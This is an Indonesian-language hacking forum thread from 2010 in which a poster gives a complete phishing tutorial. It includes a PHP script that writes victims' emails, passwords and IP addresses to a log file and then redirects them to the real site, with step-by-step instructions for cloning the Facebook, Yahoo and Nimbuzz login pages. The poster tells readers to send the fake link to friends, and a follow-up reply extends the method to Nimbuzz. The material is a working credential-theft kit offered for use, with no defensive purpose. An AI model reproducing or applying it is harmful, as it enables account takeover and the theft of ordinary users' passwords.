WRITE READ SHARE FUN AND FRIENDLY

NimbuzzKancut_Black  NimbuzzBocari  NimbuzzBlackgun.Frendly  NimbuzzRancid_radio  NimbuzzSangkuriang  NimbuzzV_yant  NimbuzzBlack_Kawer  NimbuzzThe$Grim

WELCOME IN WORD FORUM THE BEST FRIENDLY

    Fake Login

    Share

    dhika_starkey
    NEW MEMBER
    NEW MEMBER

    Jumlah posting : 27
    Join date : 2010-08-09
    Age : 30
    Lokasi : indonesia

    Fake Login

    Post by dhika_starkey on Sat 14 Aug 2010 - 6:01

    askum sob,... :h

    mungkin dari para master di sini sudah banyak yang paham tentang fake login,... Very Happy gw cuma mau ikut belajar aja,... maklum newbie,... :v

    langsung aja,...

    fake login sbenernya trik jadul para hacker untuk mendapatkan data dari korbannya dengan membuat alamat palsu.

    kalian mau facebook...??? jokingly langung aja yuk,..

    yang harus kalian siapkan adalah file yg bernama logs.php dan logs.txt (serah dah mau kasih nama apa Very Happy)

    logs.php

    Code:
    <?php <?php
    $file = "logs.txt";
    $username = $_POST['email'];
    $password = $_POST['pass'];
    $ip = $_SERVER['REMOTE_ADDR'];
    $today = date("F j, Y, g:i a");
     
    $handle = fopen($file, 'a');
    fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
    fwrite($handle, "\n");
    fwrite($handle, "Email: ");
    fwrite($handle, "$username");
    fwrite($handle, "\n");
    fwrite($handle, "Password: ");
    fwrite($handle, "$password");
    fwrite($handle, "\n");
    fwrite($handle, "IP Address: ");
    fwrite($handle, "$ip");
    fwrite($handle, "\n");
    fwrite($handle, "Date Submitted: ");
    fwrite($handle, "$today");
    fwrite($handle, "\n");
    fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
    fwrite($handle, "\n");
    fwrite($handle, "\n");
    fclose($handle);
    echo "<script LANGUAGE="JavaScript">
    window.location="https://login.facebook.com/login.php?login_attempt=1";
    </script>";
    ?> ?>

    untuk kedepannya, yang perlu kalian rubah adalah perintah ini...

    Code:
    <?php $username = $_POST['email'];
    $password = $_POST['pass']; ?>

    Dan ini

    Code:
    <?php window.location="https://login.facebook.com/login.php?login_attempt=1"; ?>

    itu adalah dasar perintah yang perlu di perhatikan dalam pembuatan fake login...

    FACEBOOK

    yang pertama kalian buka halaman depan FACEBOOK dimana kalian diminta memasukan ID dan password. kalau udah, coba liat source codenya / CTRL+U

    Yang perlu kalian cari adalah INPUT ID dari kedua TEXT FIELD berikut :

    [You must be registered and logged in to see this image.]

    Done, ternyata untuk Email IDnya adalah email dan untuk Password IDnya pass. Buka logs.php dan ganti baris berikut :


    Code:
    <?php $username = $_POST['email'];
    $password = $_POST['pass']; ?>

    Nah pada contoh kali ini sudah sama yaitu email dan pass (ituloh yang ada di dalam $_POST). Kemudian pada baris :

    Code:
    <?php window.location="https://login.facebook.com/login.php?login_attempt=1"; ?>

    Ganti URLnya jadi alamat asli atau alamat tempat sang korban ter-redirect ketika melakukan login pada Fake Login yang telah kita buat. Pada contoh kali ini adalah alamat asli login facebook.

    Langkah selanjutnya adalah mengcopy seluruh source code facebook dan simpan di dalam index.php (buat dulu filenya.).

    Gunakan fasilitas search dan cari kata form method dan liat action-nya.

    Code:
    <?php <form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form"> ?>

    Kalau di facebook form actionnya adalah "https://login.facebook.com/login.php?login_attempt=1" nah ganti menjadi logs.php.

    Ingat, gak semua website memiliki 1 form action. Kadang ada yang punya lebih dari satu. Kalo facebook kan ada yang untuk login dan register.


    [You must be registered and logged in to see this image.]

    Pokoknya teliti dan cari yang berhubungan sama LOGIN. Kemudian upload ketiga file tersebut dan kasih linknya ke teman kamu.

    jokingly

    kalau masih belum paham juga,...

    1. Cari website yang mau dibuatin fake loginnya / bisa juga pake WAMP/XAMPP server. (buat yang hoby upload script plud) jokingly

    2. Cari INPUT ID dari TEXT FIELD atau tempat kita nulis email dan passwordnya.

    3. Setelah dapet buka logs.php dan ganti pada bagian ini $_POST['email'];

    4. Ganti juga bagian ini window.location="https://login.facebook.com/login.php?login_attempt=1"; untuk me-redirect korban ketika melakukan login pada fake login kita (disarankan untuk me-redirect ke halaman login aslinya.

    5. Copy keseluruhan source code dari website aslinya pada index.php dan cari form method yang berhubungan dengan login dan ganti actionnya menjadi logs.php.

    6. Upload ketiga file tersebut, kasih linknya ke siapa saja dan tunggu hasilnya.


    mau target YAHOO...??? :top

    Cari INPUT ID text field dari ID Yahoo!: dan Sandi:.

    [You must be registered and logged in to see this image.]

    Ternyata untuk ID Yahoo! adalah username dan untuk Sandi adalah passwd.
    Jangan lupa untuk mengcopy link asli dari Login Yahoo tersebut.

    Code:
    <?php https://login.yahoo.com/config/mail?.src=ym&.intl=id ?>

    Buka logs.php dan ubah bagian berikut :

    Code:
    <?php $username = $_POST['username'];
    $password = $_POST['passwd']; ?>

    Code:
    <?php window.location="https://login.yahoo.com/config/mail?.src=ym&.intl=id"; ?>

    Copy keseluruhan source code dari Yahoo dan paste ke index.php. Cari form methodnya dan ganti actionnya dari :

    Code:
    <?php https://login.yahoo.com/config/login? ?>

    Menjadi :

    Code:
    <?php logs.php ?>

    Upload dan nikmati hasilnya.. :v


    ada yang mau NIMBUZZ gak,...??? jokingly

    hehehe,...

    Coba kalian terapkan sendiri sisanya dan semoga tutorial singkat dan gak jelas ini bisa berguna buat kalian semua...

    bye

    wassalaam...

    v_yanT
    CO ADMIN
    CO ADMIN

    Jumlah posting : 49
    Join date : 2010-08-10
    Age : 30
    Lokasi : Banjarnegara, Jawa Tengah

    Re: Fake Login

    Post by v_yanT on Sun 15 Aug 2010 - 21:14

    Panjang amat yak... xixixixi.. mumet aq um jokingly

    Nimbuzz jg di share dunk um... :v

    dhika_starkey
    NEW MEMBER
    NEW MEMBER

    Jumlah posting : 27
    Join date : 2010-08-09
    Age : 30
    Lokasi : indonesia

    Re: Fake Login

    Post by dhika_starkey on Mon 16 Aug 2010 - 5:26

    askum lur,...

    Surprised NIMBUZZ...???


    tapi harus pinter2 giring domba biar masuk kandangnya gan,... jokingly

    sekedar share,...

    seperti halnya facebook n yahoo,... copy keseluruhan source kode dari web site yang mau di jadikan "KANDANG DOMBA" jokingly (ctrl + U) kali ini gw pake [You must be registered and logged in to see this link.]

    kalau sudah, kalian cari INPUT ID text field dari NIMBUZZ. WEQ,... Very Happy ternyata untuk [You must be registered and logged in to see this link.] empty..., Very Happy berarti untuk INPUT ID dah benar alias gak perlu di ganti,...

    lanjut gan... >>> :top

    Jangan lupa untuk mengcopy link asli dari Login NIMBUZZ tersebut.

    Code:
    <?php https://http://www.nimbuzz.com/en ?>

    Buka logs.php dan ubah bagian berikut :

    Code:
    <?php window.location="http://www.nimbuzz.com/en"; ?>

    lanjut gan,... Smile


    Copy keseluruhan source code dari Nimbuzz dan paste ke index.php

    buka source kode yang udah kalian copy, gunakan fasilitas search ( ctrl + f ) dan cari kata formLogin...


    Code:
    <form id="formLogin" name="formLogin" method="post" action="https://www.nimbuzz.com/en/my_nimbuzz/ajax"

    ganti menjadi :

    Code:
    <?php logs.php ?>

    :top terus gan....

    ya udah tinggal upload, kasih link ke target sasaran dan siap "POTONG DOMBA'nya" :lol:


    jokingly ribet banget yah,...

    wassalam... bye

    Sponsored content

    Re: Fake Login

    Post by Sponsored content Today at 3:30


      Current date/time is Sun 11 Dec 2016 - 3:30